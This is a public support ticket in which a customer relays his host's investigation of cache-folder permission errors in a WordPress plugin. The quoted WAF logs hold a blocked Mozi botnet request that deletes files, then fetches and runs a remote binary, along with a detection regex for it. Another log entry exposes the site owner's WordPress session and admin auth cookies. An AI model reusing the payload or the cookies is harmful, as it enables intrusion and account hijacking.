Okay
  Public Ticket #2600657
Can't Download Widgets, Error Message regarding server permissions
Closed

Comments

  • Michael Reed started the conversation

    Here is the message I am getting: H import addon path: /home/authenti/public_html/wp-content/plugins/unlimited-elements-for-elementor-premium/cache/import/first/ could not be created. Please check your permissions

  • Michael Reed replied

    Have now spoken with my hosting to try to get them to troubleshoot. A reply to this would be helpful as I cannot use something that I have paid for due to this issue. Here is their reply:

    Hello Michael,

    Thank you very much for your patience.

    I've run multiple tests with different configurations but unfortunately, the issue persists. The problem is that the temporary files and folders created by the plugin (which are located on /home/authenti/public_html/wp-content/plugins/unlimited-elements-for-elementor-premium/cache/) have permissions 700 and 600 respectively, instead of 755 and 644.

    First I noticed the 403/404 error on AJAX functions while installing the plugin, so to prevent it from intervening I temporary disabled Wordfence.

    After this, I reviewed the site's PHP error_logs. On one of them (/home/authenti/public_html/wp-admin/error_log) the problem is being logged, however it doesn't provide more information about the source of the issue:

    #####

    [14-Nov-2020 16:07:34 UTC] PHP Warning: fopen(/home/authenti/public_html/wp-content/plugins/unlimited-elements-for-elementor-premium/cache/import/index.html): failed to open stream: Permission denied in /home/authenti/public_html/wp-content/plugins/unlimited-elements-for-elementor-premium/inc_php/framework/functions.class.php on line 1654

    [14-Nov-2020 16:07:34 UTC] PHP Warning: fwrite() expects parameter 1 to be resource, bool given in /home/authenti/public_html/wp-content/plugins/unlimited-elements-for-elementor-premium/inc_php/framework/functions.class.php on line 1655

    [14-Nov-2020 16:07:34 UTC] PHP Warning: fclose() expects parameter 1 to be resource, bool given in /home/authenti/public_html/wp-content/plugins/unlimited-elements-for-elementor-premium/inc_php/framework/functions.class.php on line 1656

    [14-Nov-2020 16:13:32 UTC] PHP Warning: fopen(/home/authenti/public_html/wp-content/plugins/unlimited-elements-for-elementor-premium/cache/import/index.html): failed to open stream: Permission denied in /home/authenti/public_html/wp-content/plugins/unlimited-elements-for-elementor-premium/inc_php/framework/functions.class.php on line 1654

    [14-Nov-2020 16:13:32 UTC] PHP Warning: fwrite() expects parameter 1 to be resource, bool given in /home/authenti/public_html/wp-content/plugins/unlimited-elements-for-elementor-premium/inc_php/framework/functions.class.php on line 1655

    [14-Nov-2020 16:13:32 UTC] PHP Warning: fclose() expects parameter 1 to be resource, bool given in /home/authenti/public_html/wp-content/plugins/unlimited-elements-for-elementor-premium/inc_php/framework/functions.class.php on line 1656

    #####

    Next, I reviewed the web server error logs, here I found some connections that were blocked by our WAF:

    #####

    [Sat Nov 14 15:17:38 2020] [error] [client 125.127.55.66] ModSecurity: Access denied with code 403, [Rule: 'ARGS|REQUEST_URI|XML:/*' '@rx ;[\s\+]?rm[\s\+]-rf[\s\+]\*'] [id "77142265"] [msg "IM360 WAF: IOT unauthenticated file upload and RCE||T:LITESPEED||MVN:/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/mozi.a;chmod+777+mozi.a;/tmp/mozi.a+jaws||MV:/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/mozi.a;chmod+777+mozi.a;/tmp/mozi.a+jaws||"] [severity "CRITICAL"] [tag "service_i360custom"]

    [Sat Nov 14 15:42:48 2020] [error] [client 211.222.69.222] ModSecurity: Access denied with code 403, [Rule: 'ARGS|REQUEST_URI|XML:/*' '@rx ;[\s\+]?rm[\s\+]-rf[\s\+]\*'] [id "77142265"] [msg "IM360 WAF: IOT unauthenticated file upload and RCE||T:LITESPEED||MVN:/shell?cd+/tmp;rm+-rf+*;wget+http://211.222.69.222:49620/mozi.a;chmod+777+mozi.a;/tmp/mozi.a+jaws||MV:/shell?cd+/tmp;rm+-rf+*;wget+http://211.222.69.222:49620/mozi.a;chmod+777+mozi.a;/tmp/mozi.a+jaws||"] [severity "CRITICAL"] [tag "service_i360custom"]

    #####

    These connections were open from remote IPs different from mine, so they shouldn't be related to the issue, but just to be safe I disabled WAF rule 77142265 for the domain pulseoftheuniverse.com.

    I continued by reviewing the WAF logs, there I found that another rule was also being hit, so I also disabled it (only for the domain pulseoftheuniverse.com):

    #####

    INFO [2020-11-14 15:30:29,209] defence360agent.internals.the_sink: SensorIncident({'user_id': '2dcbb64cbb9c5a7bc7a614f2ccd26c1be1f176b3', 'name': 'IM360 WAF: Suspicious access attempt (WP folders)!', 'timestamp': 1605367829.198694, 'plugin_id': 'modsec', 'status_code': '200', 'rule': '77140992', 'attackers_ip': '50.115.16.241', 'tag': ['service_i360custom', 'noshow'], 'severity': 5, 'advanced': {'headers': [['host', 'www.pulseoftheuniverse.com'], ['user-agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0'], ['accept', 'text/html, */*; q=0.01'], ['accept-language', 'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3'], ['accept-encoding', 'gzip, deflate, br'], ['referer', 'https://www.pulseoftheuniverse.com/wp-admin/index.php'], ['content-type', 'application/x-www-form-urlencoded; charset=UTF-8'], ['x-requested-with', 'XMLHttpRequest'], ['content-length', '179'], ['origin', 'https://www.pulseoftheuniverse.com'], ['te', 'trailers'], ['cookie', 'wordpress _sec_156fe77a74135cf04e1242177b8473af=Michael%20Reed%20Astrology%7C1605539871%7CxIpBMI2K5PQOOUEHKS3xt8JpAd0HZNTxXRYAhJLAuFe%7C324620b035c84354740ef7d7a09c1fcbac7c2b2d4815d2f17c651d016c483b8c; PHPSESSID=9d3c1a914c146c8607d03dc9b1bd552d; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_156fe77a74135cf04e1242177b8473af=Michael%20Reed%20Astrology%7C1605539871%7CxIpBMI2K5PQOOUEHKS3xt8JpAd0HZNTxXRYAhJLAuFe%7C9a894bdedc776865a84873f0a36671ae2786cce59d876a1439aa7d85843e8056; wfwaf-authcookie-195d45797c3bc8d53c878545a91236d8=16%7Cadministrator%7C044165eebebeb29c19d031ec34c2642e30344f37dd3e1495ab20dabc6e6dd5ad; wp-settings-16=editor%3Dtinymce%26libraryContent%3Dbrowse%26align%3Dleft%26urlbutton%3Dnone%26advImgDetails%3Dshow%26posts_list_mode%3Dlist%26post_dfw%3Doff%26wplink%3D1%26imgsize%3Dthumbnail%26editor_expand%3Don%26mfold%3Do%26layout_category_tab%3Dpop%26hidetb%3D1; wp-settings-time-16=1605367074']], 'uri': '/wp-admin/admin.php', 'http_method': 'POST'}, 'message': 'IM360 WAF: Suspicious access attempt (WP folders)!||SC:/home/authenti/public_html/wp-admin/admin.php||T:LITESPEED||REQUEST_URI:/wp-admin/admin.php?page=stats&noheader&chart=flot-stats-data||PC:2411||', 'method': 'INCIDENT', 'domain': None})

    #####

    Now there weren't any new WAF hits being recorded, but the issue still persisted. So I search for permissions related issues on WordPress file uploads and found 2 possible solutions, adding the following lines to the site's wp-config.php file:

    #####

    define( 'UPLOADS', 'wp-content/uploads' );

    define( 'FS_METHOD', 'direct' );

    #####

    I tried again with these lines in place but the error continued. So at this point, I re-enabled Wordfence and commented the wp-config.php lines I added.

    So far I haven't been able to pinpoint the cause of the issue, I'd sincerely advise to contact the developers of Unlimited Elements for Elementor, and relay this information to them. They should be able to find the cause of the problem or at least give some direction about it.

    Looking forward to hearing from you.


  • Michael Reed replied

    Further Update: 

    'As additional information that might be useful for the developers, I tested the regular file upload of the site's gallery and it's working correctly, the permission issue so far is exclusive to Unlimited Elements.

    Please, don't hesitate to let us know if we can be of any further assistance.'


  •   Max replied privately
  •   Michael Reed replied privately
  •   Michael Reed replied privately
  •   Michael Reed replied privately
  •   Michael Reed replied privately
  •   Max replied privately